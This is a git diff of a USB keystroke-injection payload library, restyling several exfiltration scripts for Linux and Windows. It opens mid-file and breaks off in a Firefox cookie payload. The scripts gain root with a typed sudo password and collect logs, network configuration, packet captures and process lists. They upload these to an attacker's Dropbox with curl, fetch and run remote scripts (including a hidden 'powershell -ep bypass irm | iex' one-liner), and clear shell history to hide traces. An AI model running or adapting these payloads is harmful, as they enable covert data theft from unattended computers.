+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
STRING powershell
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
index 8f44f1c6f..19cec2ebb 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
@@ -1,11 +1,9 @@
-# Exfiltrate Linux Content With Dropbox - BADUSB ✅
+# Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
-[](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take folder content on Linux Systems.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
index 346d51de4..77df4831b 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -1,12 +1,10 @@
-# Exfiltrate Linux Log Files - BADUSB ✅
+# Exfiltrate Linux Log Files
A script used to take linux logs.
**Category**: Exfiltration, Execution
-[](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take linux logs.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
index dbd546f65..721e08cd6 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -1,80 +1,93 @@
-REM ######################################################
-REM # |
-REM # Title : Exfiltrate Linux Logs With Dropbox |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ######################################################
+REM_BLOCK
+######################################################
+# #
+# Title : Exfiltrate Linux Logs With Dropbox #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+######################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #TOKEN example
-DELAY 1000
-CTRL-ALT t
+REM Send to Dropbox function
+DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-REM Required: Set here your Dropbox access TOKEN
+CTRL-ALT t
DELAY 2000
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
-
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
REM Create random num
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
-STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
DELAY 500
-STRING LOG_PATH="/var/log/"
-ENTER
+STRINGLN LOG_PATH="/var/log/"
DELAY 500
-STRING zip -r "$ZIP_PATH" "$LOG_PATH"
-ENTER
+STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
-STRING DROPBOX_FOLDER="/$ZIP_NAME"
-ENTER
+STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
-REM Send to Dropbox function
-DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_LINK
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
index 56817acb7..542ee4455 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
@@ -1,5 +1,5 @@
-# Exfiltrate Network Configuration - Linux ✅
+# Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine.
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
index 91230a996..932483b5c 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
@@ -1,96 +1,101 @@
-
-REM ##########################################################
-REM # |
-REM # Title : Exfiltrate Linux Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ##########################################################
+REM_BLOCK
+##########################################################
+# #
+# Title : Exfiltrate Linux Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+##########################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
-DELAY 1000
-CTRL-ALT t
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #TOKEN example
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
DELAY 2000
-REM Required: Set here your Dropbox access TOKEN
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
-REM DELAY 500
-REM STRING USER_NAME=$(whoami)
-REM ENTER
+DELAY 500
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
-STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
DELAY 500
-STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
-ENTER
+STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
DELAY 1000
-STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
-ENTER
+STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
DELAY 1000
-STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
-ENTER
+STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
-
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-ENTER
-STRING DROPBOX_FOLDER_NAME
-ENTER
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
-DELAY 2000
-STRING history -c
-ENTER
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+DELAY 2000
+STRINGLN history -c
DELAY 500
-STRING rm -rf "$ZIP_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
DELAY 500
-STRING exit
-ENTER
\ No newline at end of file
+STRINGLN rm -rf "$ZIP_PATH"; exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
index 510492331..04209f128 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
@@ -1,57 +1,76 @@
-
-REM #############################################
-REM # |
-REM # Title : Exfiltrate Network Traffic |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Exfiltrate Network Traffic #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
+
REM REQUIRED: Set what you want to sniff, for example tcp port 80
-DEFINE SNIFFING example
+DEFINE #SNIFFING example
+
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
-DEFINE TOKEN example
+DEFINE #TOKEN example
+
REM Just a Dropbox const
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-REM Output file path packets.pcap, remember to use pcap extension
-DEFINE FILE example.pcap
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+REM Output file path packets.pcap, remember to use pcap extension
+DEFINE #FILE example.pcap
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
STRINGLN sudo su
DELAY 1000
-STRINGLN SUDO_PASS
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### Network Traffic SECTION ####
-
-
-STRING FILE_PATH="
-STRING FILE
-STRING "
-ENTER
+STRINGLN FILE_PATH="#FILE"
DELAY 500
-STRING filter_expression="
-STRING SNIFFING
-STRING "
-ENTER
+STRINGLN filter_expression="#SNIFFING"
DELAY 500
REM Network card name
@@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
-
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
-ENTER
-
+STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
REM #### REMOVE TRACES ####
-
-
STRINGLN rm "$FILE_PATH"
DELAY 500
diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
index 8a26d4394..c0314dfd6 100644
--- a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
+++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
@@ -1,13 +1,14 @@
-
-REM ##################################################
-REM # |
-REM # Title : Exfiltrate Photos Through Shell |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##################################################
+REM_BLOCK
+##################################################
+# #
+# Title : Exfiltrate Photos Through Shell #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
-DEFINE SCRIPT-SH-LINK example.com
+DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
-DEFINE SUDO-PSWD example
+DEFINE #SUDO-PSWD example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### Permission ####
-
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 500
-STRING SUDO-PSWD
-ENTER
+STRINGLN #SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
-REM STRING apt install fswebcam -y
-REM ENTER
+REM STRINGLN apt install fswebcam -y
REM DELAY Based On Internet Power
REM DELAY 5000
-
REM #### Script ####
-
-
-STRING curl
-STRING SCRIPT-SH-LINK
-STRING > script.sh
-ENTER
+STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
-STRING chmod +x script.sh
-ENTER
+STRINGLN chmod +x script.sh
DELAY 500
-STRING nohup ./script.sh > /dev/null 2>&1 & exit
-ENTER
+STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
index bdea2510f..3a3ccae9e 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@@ -1,73 +1,79 @@
-
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
-DELAY 1000
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### GET PROCESS SECTION ####
-
-
-STRING ps aux > process.txt
-ENTER
+STRINGLN ps aux > process.txt
DELAY 500
-
REM #### EXFILTRATE SECTION ####
-
-
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING TXT_PATH="/home/$USER_NAME/process.txt"
-ENTER
+STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
DELAY 500
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-STRING DROPBOX_FOLDER_NAME
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
-ENTER
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
-STRING history -c
-ENTER
-DELAY 500
-STRING exit
-ENTER
+STRINGLN history -c; exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
index 1b02c917b..771665820 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
@@ -1,26 +1,66 @@
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
-DEFINE PAYLOAD example.com
+DEFINE #PAYLOAD example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass irm
-STRING PAYLOAD
-STRING | iex
-ENTER
+STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
index faf0d9fbb..432a66ac0 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
@@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
Github
-
-
-
-
-
Instagram
- |
-
Discord
+
Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
index 86103688a..bc463548b 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
@@ -1,26 +1,68 @@
-REM #########################################################################
-REM # |
-REM # Title : Exfiltrates the entire database of the Notion client |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################################################
-
+REM_BLOCK
+#########################################################################
+# #
+# Title : Exfiltrates the entire database of the Notion client #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+#########################################################################
+END_REM
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING PowerShell
-ENTER
+STRINGLN PowerShell
DELAY 2000
REM Settings about Notion DB
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c85..88aa91e1b 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -1,31 +1,69 @@
-REM ####################################################
-REM # |
-REM # Title : Export Firefox Cookies Database |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################
-
+REM_BLOCK
+####################################################
+# #
+# Title : Export Firefox Cookies Database #
+# Author : Aleff #
+# Version : 1.0 #
